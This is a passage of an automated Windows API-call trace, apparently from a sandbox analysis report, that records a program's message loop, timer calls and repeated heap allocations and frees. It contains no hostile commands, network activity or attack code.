0 [0135.765] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0135.765] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0135.765] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0135.765] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0135.766] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.766] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0135.766] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0135.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.766] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0135.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0135.767] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0135.767] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0135.767] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0135.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0135.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0135.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0135.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0135.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0135.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0135.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0135.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0135.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0135.772] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0135.772] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0135.773] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0135.773] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0135.773] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0135.773] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.774] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.775] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.775] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.775] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0135.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0135.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.776] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.776] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0135.776] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0135.777] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0135.777] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0135.777] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0135.778] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0135.778] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0135.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0135.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0135.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 